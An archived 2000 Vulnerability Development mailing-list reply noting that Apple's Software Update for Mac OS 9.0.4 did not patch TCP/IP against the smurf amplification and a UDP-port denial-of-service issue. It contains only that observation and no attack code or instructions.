Vulnerability Development mailing list archives

Re: Apple Mac DoS

From: "Matteo,Marc A." <mmatteo () FUSIONSTORM COM>
Date: Fri, 15 Dec 2000 09:46:18 -0800

FWIW I just re-installed a Mac OS 9 system from an original iMac OS 9 CD
and then ran Apple's Software Update to get the necessary updates (like
OS 9.0.4).

The Mac OS was updated to 9.0.4 but TCP/IP was NOT automatically updated
to fix the smurf amp (or that high UDP port DoS - I can't remember the
port).

I found that interesting.  I wondow how many Mac users have upgraded
TCP/IP manually?

Marc